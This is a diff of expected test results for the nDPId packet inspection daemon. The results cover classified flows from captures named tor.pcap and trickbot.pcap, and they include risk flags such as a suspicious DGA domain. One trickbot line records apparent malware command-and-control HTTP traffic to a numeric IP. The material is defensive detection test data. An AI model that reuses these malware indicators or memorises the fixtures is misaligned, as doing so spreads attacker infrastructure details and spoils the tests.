{"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822134212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822133931,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1944,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822136212} @@ -253,8 +253,8 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822192212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822192034,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822194212} @@ -283,7 +283,7 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822216211,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1383822217531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822217531,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDIMBZjPcAAgAAgAAAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822218212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822218202,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2800,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1383822218758,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"thread_ts_msec":1383822218758,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDB8BZjPcAAgAAgBkAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="} @@ -347,12 +347,12 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822276211} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","packets-captured":3859,"packets-processed":3694,"total-skipped-flows":0,"total-l4-payload-len":2811958,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":10,"total-detection-updates":7,"total-updates":1,"current-active-flows":0,"total-active-flows":11,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":356,"global_ts_msec":1383822276211} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3859/3694 @@ -362,9 +362,9 @@ ~~ total active/idle flows...: 11/11 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6002035 bytes -~~ total memory freed........: 6002035 bytes -~~ total allocations/frees...: 121879/121879 +~~ total memory allocated....: 6135669 bytes +~~ total memory freed........: 6135669 bytes +~~ total allocations/frees...: 124641/124641 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 182 chars ~~ json string max len.......: 1405 chars diff --git a/test/results/trickbot.pcap.out b/test/results/trickbot.pcap.out index cd202d03a..da1f0299a 100644 --- a/test/results/trickbot.pcap.out +++ b/test/results/trickbot.pcap.out @@ -4,9 +4,9 @@ 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"} -01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} 